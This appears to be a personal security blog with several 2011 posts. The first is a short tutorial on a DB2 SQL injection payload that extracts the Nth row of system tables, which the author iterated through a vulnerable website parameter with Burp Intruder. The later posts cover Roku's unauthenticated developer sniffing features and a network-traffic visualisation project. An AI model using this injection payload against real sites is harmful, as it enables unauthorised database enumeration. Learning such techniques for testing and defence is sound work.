2011-09-13

DB2 SQL Injection : Select the Nth row without cursors

Well I've looked all over the net for this solution and I could not find the answer so after much trial an error I was able to build my own solution. Lets say you need to query one row at a time from DB2 and you cannot use cursors and specifically you need to query sysibm.systables. I came up with this solution and there may be a more elegant way but this worked.

select * from (
        select * from systables order by name asc fetch first 1 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 2 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 3 rows only
) as G order by name desc fetch first 1 rows only

...

...

select * from (
        select * from systables order by name asc fetch first 1000 rows only
) as G order by name desc fetch first 1 rows only

I put the below query into a vulnerable parameter sent to a website and used burp intruder to iterate through each row by incrementing N.

select * from (
        select * from systables order by name asc fetch first N rows only
) as G order by name desc fetch first 1 rows only

The query works by first requesting N number of rows with the data ordered ascending and thus putting the Nth row on the bottom of the Result Set. Next query the Result Set ordered desc so that the Nth row is now at the top of the Result Set and fetch the first row. The Result Set will then return the Nth row you need without having to define cursors.

burp intrude1

 

2011-04-28

Hacking 101 with Tracer-T

This makes me laugh every time I watch it. I still cannot figure out if the kid is joking or serious.

2011-03-27

Roku hidden features.

I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have and SDK you can download for free and you don’t need to pay anything to distribute your app as long as your distributing it for free. You can easily put your device into ‘Development Mode’ and this Development mode lets you upload code directly to the device though an HTTP interface and also enables a telnet port for which you can step through/debug the code. I think it’s great that you have the option to run the code locally on your own device or create a private channel so that only a select few can see it, or make it public (i.e. every one in the world). I’m still new into this but i can’t help but wonder what their app review process is like to ensure malware-like apps are not being distributed but i’ll get more into that at a later date.

All of this is cool and I can’t wait to make my own channel but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump that will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up.

Be forewarned, there doesn’t seem to be any security around this stuff once its enabled though. No password is required to access any of these features once they are enabled but you must use the remote to enable them. Its like putting in the cheat codes to old Nintendo games. UP,UP,DN,DN, Left,Right,Left,Right, B,A….

The channel code is written in BrightScript which is completely new to me. It looks alot, well exactly, like VB Script. I have never been a big fan of languages that don’t end lines in semi-colons. Probably because I started learning programming in C. I was actually kinda expecting sometime more java like. That was more wishfully thinking on my part I guess.

Since its got tcpdump built into it lets see if i can port RADAR over to it. :P

2011-03-25

Hack Like in the Movies… with RADAR

I have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near realtime. My idea was to give the users the freedom of movement similar to a First Person Shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view.

Introducing RADAR

RADAR is written in Java using openGL so that it should be easy to port to any system. It has a built in network sniffer and currently only nmap integration. It currently listens to network traffic and will animate information about all devices it finds on the network including open ports, whois, HTTP request/responses, etc. When complete it will have the ability to record, playback, pause, rewind, and slow down these events in the animation.
RADAR represents all IP devices as 3d orbs and places them in rings that somewhat represent subnets but basically anything that matches the first two octets goes into a ring group at this point (may be better later on). All orbs can be clicked to display detailed information about what’s communicating with the host. It displays a parsed out view of the pcap data by row and when a row is selected a view of the actual hexdump is visible. This can better be explained by the video below.

 

Download Coming Soon…

Soon as I feel comfortable with it I will release a version that any of you out there can try out.